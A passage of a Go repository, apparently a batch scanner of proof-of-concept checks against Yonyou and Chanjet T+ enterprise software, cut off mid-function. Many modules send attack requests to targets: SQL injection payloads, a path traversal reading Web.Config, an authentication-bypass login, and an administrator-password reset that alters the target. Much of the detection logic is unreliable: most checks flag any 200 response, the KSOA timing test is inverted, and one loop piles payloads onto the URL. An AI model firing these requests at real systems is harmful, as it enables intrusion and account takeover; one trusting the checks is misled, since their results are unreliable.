├── pkg
    ├── test
    │   └── test.go
    ├── utils
    │   └── utils.go
    ├── POC
    │   ├── fs-rzBypass
    │   │   └── fs-rzBypass.go
    │   ├── ConfigurationNc
    │   │   └── ConfigurationNc.go
    │   ├── Uapjs-JNDI
    │   │   └── Uapjs-JNDI.go
    │   ├── NCCloud-FS-sqljni
    │   │   └── yonyou-NCCloud-FS-sqljni.go
    │   ├── ERP-NC-MLBL
    │   │   └── yonyou-ERP-NC-MLBL.go
    │   ├── GRP-U8-Proxy-sqljin-xxe
    │   │   └── GRP-U8-Proxy-sqljin-xxe.go
    │   ├── U8-OA-test-sqjni
    │   │   └── U8-OA-test-sqjni.go
    │   ├── T-DownloadProxy-catfile
    │   │   └── T-DownloadProxy-catfile.go
    │   ├── uapws-wsdl-XXE
    │   │   └── uapws-wsdl-XXE.go
    │   ├── KSOA-ImageUpload
    │   │   └── KSOA-ImageUpload.go
    │   ├── NC-BshServlet
    │   │   ├── yonyou-NC-BshServlet.go
    │   │   └── payload.txt
    │   ├── T-CRM-sqljni
    │   │   └── T-CRM-sqljni.go
    │   ├── fs-dlbypass
    │   │   └── fs-dlbypass.go
    │   ├── KSOA-sqljni
    │   │   └── KSOA-sqljni.go
    │   ├── T-RecoverPassword
    │   │   └── T-RecoverPassword.go
    │   ├── uapws-acessBypass
    │   │   └── uapws-acessBypass.go
    │   ├── T-Uploadfile
    │   │   └── T-Uploadfile.go
    │   ├── accept-upload
    │   │   └── accept-upload.go
    │   ├── GRP-U8-U8AppProxy
    │   │   └── GRP-U8-U8AppProxy.go
    │   ├── GRP-U8-UploadFileData
    │   │   └── GRP-U8-UploadFileData.go
    │   ├── NC6.5-UploadFile
    │   │   └── yonyou-NC6.5-UploadFile.go
    │   ├── UploadServlet-Deser
    │   │   └── UploadServlet-Deser.go
    │   ├── MessageServlet-Deser
    │   │   └── MessageServlet-Deser.go
    │   ├── files-Deser
    │   │   └── files-Deser.go
    │   ├── NC-Cloud-MxServlet
    │   │   └── NC-Cloud-MxServlet.go
    │   ├── U8-RegisterServlet
    │   │   └── U8-RegisterServlet.go
    │   ├── u8-LoginServlet
    │   │   └── u8-LoginServlet.go
    │   ├── NC-XbrlPersistenceServlet
    │   │   └── yonyou-NC-XbrlPersistenceServlet.go
    │   ├── u8-MonitorServlet
    │   │   └── u8-MonitorServlet.go
    │   ├── U8-OA-getSessionList
    │   │   └── U8-OA-getSessionList.go
    │   ├── U8-ActionHandlerServlet
    │   │   └── U8-ActionHandlerServlet.go
    │   ├── U8-CacheInvokeServlet
    │   │   └── U8-CacheInvokeServlet.go
    │   ├── U8-ClientRequestDispatch
    │   │   └── U8-ClientRequestDispatch.go
    │   ├── u8-ServletCommander
    │   │   └── u8-ServletCommander.go
    │   ├── U8-FileTransportServlet
    │   │   └── U8-FileTransportServlet.go
    │   ├── FileReceiveServlet-Deser
    │   │   └── FileReceiveServlet-Deser.go
    │   ├── U8-TaskTreeQuery
    │   │   └── U8-TaskTreeQuery.go
    │   ├── u8-LoggingConfigServlet
    │   │   └── u8-LoggingConfigServlet.go
    │   ├── u8-TableInputOperServlet
    │   │   └── u8-TableInputOperServlet.go
    │   ├── NC-JiuQiClientReqDispatch
    │   │   └── NC-JiuQiClientReqDispatch.go
    │   └── monitorservlet-Desera
    │   │   └── monitorservlet-Desera.go
    ├── dnslog
    │   └── dnslog.go
    ├── qi
    │   └── qi.go
    └── config
    │   └── config.go
├── .idea
    ├── .gitignore
    ├── vcs.xml
    ├── modules.xml
    └── yonyouScan.iml
├── main.go
├── .github
    ├── workflows
    │   └── release1.yml
    └── conf
    │   └── .goreleaser.yml
├── go.mod
├── README.md
└── go.sum


/pkg/test/test.go:
--------------------------------------------------------------------------------
1 | package main
2 | 
3 | func main() {
4 | 
5 | }
6 | 


--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 | 


--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="VcsDirectoryMappings">
4 |     <mapping directory="$PROJECT_DIR$" vcs="Git" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/yonyouScan.iml" filepath="$PROJECT_DIR$/.idea/yonyouScan.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/.idea/yonyouScan.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="WEB_MODULE" version="4">
3 |   <component name="Go" enabled="true" />
4 |   <component name="NewModuleRootManager">
5 |     <content url="file://$MODULE_DIR$" />
6 |     <orderEntry type="inheritedJdk" />
7 |     <orderEntry type="sourceFolder" forTests="false" />
8 |   </component>
9 | </module>


--------------------------------------------------------------------------------
/pkg/utils/utils.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import "strings"
 4 | 
 5 | // InsertBackslashX 在每两个字符后以及首字符前插入"\x"
 6 | func InsertBackslashX(s string) string {
 7 | 	var result strings.Builder
 8 | 	result.WriteString("\\x") // 在开始时先写入"\x"
 9 | 
10 | 	for i, r := range s {
11 | 		if i > 0 && i%2 == 0 {
12 | 			result.WriteString("\\x") // 每两个字符后插入"\x"
13 | 		}
14 | 		result.WriteRune(r) // 写入当前字符
15 | 	}
16 | 	return result.String()
17 | }
18 | 


--------------------------------------------------------------------------------
/pkg/POC/fs-rzBypass/fs-rzBypass.go:
--------------------------------------------------------------------------------
 1 | package fs_rzBypass
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/fs/;/console.html"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Post(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 文件服务器 认证绕过漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/ConfigurationNc/ConfigurationNc.go:
--------------------------------------------------------------------------------
 1 | package ConfigurationNc
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/uapws/service"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Get(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 NC 配置文件泄露漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 NC 配置文件泄露漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 NC 配置文件泄露漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/Uapjs-JNDI/Uapjs-JNDI.go:
--------------------------------------------------------------------------------
 1 | package Uapjs_JNDI
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/uapjs/jsinvoke/?action=invoke"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Post(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 Uapjs JNDI注入漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 Uapjs JNDI注入漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 Uapjs JNDI注入漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/NCCloud-FS-sqljni/yonyou-NCCloud-FS-sqljni.go:
--------------------------------------------------------------------------------
 1 | package NCCloud_FS_sqljni
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | )
 7 | 
 8 | var (
 9 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest()
10 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
11 | )
12 | 
13 | func Run(url string) {
14 | 	url = url + "/fs"
15 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
16 | 		"User-Agent": UA,
17 | 	}).Get(url)
18 | 	if err != nil {
19 | 		color.Red.Println("[-] 用友 NCCloud FS 文件管理 SQL 注入不存在")
20 | 		return
21 | 	}
22 | 	if resp.Status == "200 OK" {
23 | 		color.Green.Println("[+] 用友 NCCloud FS 文件管理 SQL 注入存在，只访问了fs，记得sqlmap跑下username参数来确认 -> " + url)
24 | 		return
25 | 	}
26 | 	color.Red.Println("[-] 用友 NCCloud FS 文件管理 SQL 注入不存在")
27 | }
28 | 


--------------------------------------------------------------------------------
/pkg/POC/ERP-NC-MLBL/yonyou-ERP-NC-MLBL.go:
--------------------------------------------------------------------------------
 1 | package ERP_NC_MLBL
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/NCFindWeb?service=IPreAlertConfigService&filename="
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Get(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 ERP-NC 目录遍历漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 ERP-NC 目录遍历漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 ERP-NC 目录遍历漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/GRP-U8-Proxy-sqljin-xxe/GRP-U8-Proxy-sqljin-xxe.go:
--------------------------------------------------------------------------------
 1 | package GRP_U8_Proxy_sqljin_xxe
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/Proxy"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Post(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 GRP-U8 Proxy SQL注入漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 GRP-U8 Proxy SQL注入漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 GRP-U8 Proxy SQL注入漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/U8-OA-test-sqjni/U8-OA-test-sqjni.go:
--------------------------------------------------------------------------------
 1 | package U8_OA_test_sqjni
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Get(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 U8 OA test.jsp SQL注入漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 U8 OA test.jsp SQL注入漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 U8 OA test.jsp SQL注入漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/T-DownloadProxy-catfile/T-DownloadProxy-catfile.go:
--------------------------------------------------------------------------------
 1 | package T_DownloadProxy_catfile
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Get(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 畅捷通T+ DownloadProxy任意文件读取漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 畅捷通T+ DownloadProxy任意文件读取漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 畅捷通T+ DownloadProxy任意文件读取漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/uapws-wsdl-XXE/uapws-wsdl-XXE.go:
--------------------------------------------------------------------------------
 1 | package uapws_wsdl_XXE
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | // /uapws/service/nc.uap.oba.update.IUpdateService?xsd={{{xmlUrl}}}
10 | 
11 | var (
12 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
13 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
14 | )
15 | 
16 | func Run(url string) {
17 | 	url = url + "/uapws/service/nc.uap.oba.update.IUpdateService?xsd="
18 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
19 | 		"User-Agent": UA,
20 | 	}).Get(url)
21 | 	if err != nil {
22 | 		color.Red.Println("[-] 用友 NC IUpdateService XXE漏洞不存在")
23 | 		return
24 | 	}
25 | 	if resp.Status == "200 OK" {
26 | 		color.Green.Println("[+] 用友 NC IUpdateService XXE漏洞存在 -> " + url)
27 | 		return
28 | 	}
29 | 	color.Red.Println("[-] 用友 NC IUpdateService XXE漏洞不存在")
30 | }
31 | 


--------------------------------------------------------------------------------
/pkg/POC/KSOA-ImageUpload/KSOA-ImageUpload.go:
--------------------------------------------------------------------------------
 1 | package KSOA_ImageUpload
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/servlet/com.sksoft.bill.ImageUpload?filename=test&filepath=/"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).SetBody("1").Get(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 时空KSOA com.sksoft.bill.ImageUpload 任意文件上传漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"flag"
 5 | 	"fmt"
 6 | 	"os"
 7 | 	"yongyouScan/pkg/config"
 8 | 	"yongyouScan/pkg/qi"
 9 | )
10 | 
11 | var (
12 | 	Url  string
13 | 	file string
14 | )
15 | 
16 | func usage() {
17 | 	fmt.Println(`Usage of main.exe:
18 |   -u url
19 |       you target, example: 127.0.0.1
20 |   -f targets.txt
21 | 	  Read the target from the file and test the vulnerabilities in batches
22 |   `)
23 | }
24 | 
25 | func main() {
26 | 	flag.StringVar(&Url, "u", "", "your target")
27 | 	flag.StringVar(&file, "f", "", "Specify batch target")
28 | 	flag.Usage = usage
29 | 	flag.Parse()
30 | 
31 | 	if Url == "" && file == "" {
32 | 		usage()
33 | 		os.Exit(0)
34 | 	}
35 | 
36 | 	qi.Logo()
37 | 
38 | 	qi4l := config.WorkExp{
39 | 		Url: Url,
40 | 	}
41 | 
42 | 	if file != "" {
43 | 		lines, err := qi.ReadLinesFromFile(file)
44 | 		if err != nil {
45 | 			fmt.Println(err)
46 | 			return
47 | 		}
48 | 		for _, line := range lines {
49 | 			qi4l.Url = line
50 | 			qi4l.YonYouScanRun()
51 | 		}
52 | 	}
53 | 
54 | 	qi4l.YonYouScanRun()
55 | }
56 | 


--------------------------------------------------------------------------------
/.github/workflows/release1.yml:
--------------------------------------------------------------------------------
 1 | name: goreleaser
 2 | 
 3 | on:
 4 |   push:
 5 |     tags:
 6 |       - '*'
 7 | 
 8 | permissions:
 9 |   contents: write
10 | 
11 | jobs:
12 |   goreleaser:
13 |     runs-on: ubuntu-latest
14 |     timeout-minutes: 60
15 |     steps:
16 |       - name: "Check out code"
17 |         uses: actions/checkout@v3
18 |         with:
19 |           fetch-depth: 0
20 | 
21 |       - name: "Set up Go"
22 |         uses: actions/setup-go@v4
23 |         with:
24 |           go-version: 1.21.x
25 |       -
26 |         name: Install UPX
27 |         uses: crazy-max/ghaction-upx@v3
28 |         with:
29 |           install-only: true
30 | 
31 |       - name: UPX version
32 |         run: upx --version
33 | 
34 |       -
35 |         name: "Create release on GitHub"
36 |         uses: goreleaser/goreleaser-action@v4
37 |         with:
38 |           distribution: goreleaser
39 |           version: latest
40 |           args: "release --clean --debug -f .github/conf/.goreleaser.yml"
41 |           workdir: .
42 |         env:
43 |           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}


--------------------------------------------------------------------------------
/pkg/POC/NC-BshServlet/yonyou-NC-BshServlet.go:
--------------------------------------------------------------------------------
 1 | package NC_BshServlet
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	_ "embed"
 6 | 	"github.com/gookit/color"
 7 | 	"github.com/imroc/req/v3"
 8 | 	"strings"
 9 | 	"time"
10 | )
11 | 
12 | //go:embed payload.txt
13 | var Payload string
14 | 
15 | var (
16 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(1 * time.Second)
17 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
18 | )
19 | 
20 | func Run(url string) {
21 | 	scanner := bufio.NewScanner(strings.NewReader(Payload))
22 | 	for scanner.Scan() {
23 | 		line := scanner.Text()
24 | 		url = url + line
25 | 		resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
26 | 			"User-Agent": UA,
27 | 		}).Get(url)
28 | 		if err != nil {
29 | 		} else {
30 | 			if resp.Status == "200 OK" {
31 | 				color.Green.Println("[+] 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞存在 -> " + url)
32 | 				return
33 | 			}
34 | 		}
35 | 	}
36 | 	color.Red.Println("[-] 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞不存在")
37 | }
38 | 


--------------------------------------------------------------------------------
/pkg/POC/T-CRM-sqljni/T-CRM-sqljni.go:
--------------------------------------------------------------------------------
 1 | package T_CRM_sqljni
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Post(url)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞存在 -> " + url)
25 | 		return
26 | 	}
27 | 	color.Red.Println("[-] 用友 畅捷通T-CRM get_usedspace.php SQL注入漏洞不存在")
28 | }
29 | 


--------------------------------------------------------------------------------
/pkg/POC/fs-dlbypass/fs-dlbypass.go:
--------------------------------------------------------------------------------
 1 | package fs_dlbypass
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"strings"
 7 | 	"time"
 8 | )
 9 | 
10 | var (
11 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
12 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
13 | )
14 | 
15 | func Run(url string) {
16 | 	url = url + "/fs/;/console"
17 | 	resp, err := client.R().
18 | 		SetHeaders(map[string]string{ // Set multiple headers at once
19 | 			"User-Agent": UA,
20 | 		}).
21 | 		SetFormData(map[string]string{
22 | 			"operType": "login",
23 | 			"username": "123",
24 | 			"password": "%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D",
25 | 		}).Post(url)
26 | 	if err != nil {
27 | 		color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在")
28 | 		return
29 | 	}
30 | 	if strings.Contains(resp.String(), "{\"login\":\"false\"}") {
31 | 		color.Green.Println("[+] 用友 文件服务器 认证绕过漏洞存在 -> " + url)
32 | 		return
33 | 	}
34 | 	color.Red.Println("[-] 用友 文件服务器 认证绕过漏洞不存在")
35 | }
36 | 


--------------------------------------------------------------------------------
/pkg/POC/KSOA-sqljni/KSOA-sqljni.go:
--------------------------------------------------------------------------------
 1 | package KSOA_sqljni
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(7 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | //https://blog.csdn.net/qq_41904294/article/details/134981039?spm=1001.2014.3001.5502
15 | 
16 | func Run(url string) {
17 | 	url = url + "/linksframe/linkadd.jsp?id=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27"
18 | 	startTime := time.Now()
19 | 	_, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
20 | 		"User-Agent": UA,
21 | 	}).Get(url)
22 | 	if err != nil {
23 | 		color.Red.Println("[-] 用友时空 KSOA 多处SQL注入漏洞不存在")
24 | 		return
25 | 	}
26 | 	endTime := time.Now()
27 | 	duration := endTime.Sub(startTime)
28 | 	if duration <= 5*time.Second {
29 | 		color.Green.Println("[+] 用友时空 KSOA 多处SQL注入漏洞存在 -> " + url)
30 | 		return
31 | 	}
32 | 	color.Red.Println("[-] 用友时空 KSOA 多处SQL注入漏洞不存在")
33 | }
34 | 


--------------------------------------------------------------------------------
/pkg/POC/T-RecoverPassword/T-RecoverPassword.go:
--------------------------------------------------------------------------------
 1 | package T_RecoverPassword
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url = url + "/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
16 | 	resp, err := client.R().
17 | 		SetHeaders(map[string]string{ // Set multiple headers at once
18 | 			"User-Agent":   UA,
19 | 			"Content-Type": "application/x-www-form-urlencoded",
20 | 		}).SetBody("{\"pwdNew\":\"46f94c8de14fb36680850768ff1b7f2a\"}").Post(url)
21 | 	if err != nil {
22 | 		color.Red.Println("[-] 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞不存在")
23 | 		return
24 | 	}
25 | 	if resp.Status == "200 OK" {
26 | 		color.Green.Println("[+] 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞存在 -> " + url)
27 | 		return
28 | 	}
29 | 	color.Red.Println("[-] 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞不存在")
30 | }
31 | 


--------------------------------------------------------------------------------
/pkg/POC/uapws-acessBypass/uapws-acessBypass.go:
--------------------------------------------------------------------------------
 1 | package uapws_acessBypass
 2 | 
 3 | import (
 4 | 	"github.com/gookit/color"
 5 | 	"github.com/imroc/req/v3"
 6 | 	"time"
 7 | )
 8 | 
 9 | var (
10 | 	client = req.C().EnableForceHTTP1().EnableDumpEachRequest().SetTimeout(5 * time.Second)
11 | 	UA     = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
12 | )
13 | 
14 | func Run(url string) {
15 | 	url1 := url + "/uapws/index.jsp"
16 | 	resp, err := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
17 | 		"User-Agent": UA,
18 | 	}).Get(url1)
19 | 	if err != nil {
20 | 		color.Red.Println("[-] 用友 uapws 认证绕过漏洞不存在")
21 | 		return
22 | 	}
23 | 	if resp.Status == "200 OK" {
24 | 		color.Green.Println("[+] 用友 uapws 认证绕过漏洞存在 -> " + url1)
25 | 	}
26 | 	url2 := url + "/uapws/login.ajax"
27 | 	resp1, err1 := client.R().SetHeaders(map[string]string{ // Set multiple headers at once
28 | 		"User-Agent": UA,
29 | 	}).Get(url2)
30 | 	if err1 != nil {
31 | 		color.Red.Println("[-] 用友 uapws 认证绕过漏洞不存在")
32 | 		return
33 | 	}
34 | 	if resp1.Status == "200 OK" {
35 | 		color.Green.Println("[+] 用友 uapws 认证绕过漏洞存在 -> " + url2)
36 | 		return
37 | 	}
